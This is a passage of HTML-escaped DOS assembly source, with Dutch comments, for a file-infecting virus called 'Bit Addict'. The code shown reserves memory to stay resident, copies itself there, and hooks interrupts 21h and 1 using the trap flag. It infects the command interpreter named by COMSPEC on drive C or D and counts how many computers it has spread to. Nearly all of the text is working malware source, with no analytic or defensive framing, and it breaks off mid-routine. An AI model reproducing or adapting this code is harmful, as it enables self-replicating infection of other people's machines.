&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; resident te laten blijven&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; es&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; en om de comspec te&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; Init&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; infecteren&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jnc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@12&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; BiosCheck&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Als bit addict op een andere&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; computer draait wordt er een&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; teller verhoogt.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; al,al&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,VirusSize-CodeSize&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; zet alle variabelen op nul&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,CodeSize&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; rep&amp;nbsp;&amp;nbsp;&amp;nbsp; stosb&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; debug interrupt 21h om het&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DebugOn&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; orginele interrupt te vinden&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,4ah&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; en reserveer geheugen voor&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,-1&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; bit addict.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; bx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DebugOff&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; bx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,cs&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; sub&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,cs:MinMem&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,CodeSizePara+VirusSizePara+1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jb&amp;nbsp;&amp;nbsp;&amp;nbsp; @@12&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,4ah&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; sub&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,VirusSizePara+1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jb&amp;nbsp;&amp;nbsp;&amp;nbsp; @@12&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,48h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,VirusSizePara&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jb&amp;nbsp;&amp;nbsp;&amp;nbsp; @@12&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; es,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dec&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ds,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr ds:[1],8&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; CopyBitAddict&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Copieer bit addict naar&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; het gereserveerde geheugen&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; es&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Infecteer bestand in de&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; InfectComspec&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; comspec&lt;br /&gt;
@@12:&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; ga nu verder met het&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; programma voor Bit Addict&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cli&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ss,cs:OldSS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; sp,cs:OldSP&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; sti&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldCSIP&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comspec&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; db&amp;nbsp;&amp;nbsp;&amp;nbsp; 'COMSPEC='&amp;nbsp;&amp;nbsp;&amp;nbsp; ; comspec environment variabele&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; om de command.com te vinden&lt;br /&gt;
&lt;br /&gt;
ID&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 0DEADh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; hier wordt het virus herkend&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; als het in het geheugen staat&lt;br /&gt;
&lt;br /&gt;
Count&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; In deze variabele staat op&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; hoeveel verschillende&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; computers het virus is&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; geweest&lt;br /&gt;
Bios&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; db&amp;nbsp;&amp;nbsp;&amp;nbsp; 10h dup(0)&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Gegevens over de bios,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; door dit te vergelijken met&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; de bios kan het virus weten&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; of het virus op een andere&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; computer draait&lt;br /&gt;
&lt;br /&gt;
CopyBitAddict:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; copieer Bit Addict naar de&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; gereserveerde buffers&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; si,si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; di,di&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,VirusSize&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; rep&amp;nbsp;&amp;nbsp;&amp;nbsp; movsb&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; leid interrupt 21h om naar&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ds,ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Bit Addict&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr ds:[84h],offset NewInt21&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr ds:[86h],es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
InfectComspec:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; es,es:[2ch]&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; lees environment segment&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; di,di&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; zoek naar de comspec&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; variabele&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si,offset Comspec&lt;br /&gt;
@@30:&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; di&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,8&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; repe&amp;nbsp;&amp;nbsp;&amp;nbsp; cmpsb&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; di&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@31&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; al,al&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,-1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; repne&amp;nbsp;&amp;nbsp;&amp;nbsp; scasb&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; byte ptr es:[di],0&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; is dit de laatste variabele ?&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@30&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; short @@33&lt;br /&gt;
@@31:&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; es&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; infecteer de COMMAND.COM of&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; andere command interpreter,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; byte ptr ds:[di+9],':'&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; maar doe dit alleen wanneer&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@32&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; de comspec naar de c of de&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; al,ds:[di+8]&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; d-drive wijst.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; and&amp;nbsp;&amp;nbsp;&amp;nbsp; al,0dfh&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; al,'C'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@32&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; al,'D'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@33&lt;br /&gt;
@@32:&amp;nbsp;&amp;nbsp;&amp;nbsp; lea&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,[di+8]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldIP&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; bewaar alle variabelen die&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldCS&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; we nog nodig hebben.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldSP&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldSS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; Infect&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; infecteren&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldSS&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; herstel alle variabelen die&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldSP&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; we nog nodig hebben&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldCS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldIP&lt;br /&gt;
@@33:&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
DebugOn:push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; deze procedere is om de&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; trap-flag te zetten, en&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; interrupt 1 te initialiseren&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ds,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cli&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ds:[4h]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr cs:OldInt1[0],ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ds:[6h]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr cs:OldInt1[2],ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr ds:[4],offset NewInt1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr ds:[6],cs&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ds:[84h]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr cs:OldInt21[0],ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ds:[86h]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr cs:OldInt21[2],ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr cs:DosInt21[0],0&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr cs:DosInt21[2],0&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pushf&lt;br /&gt;
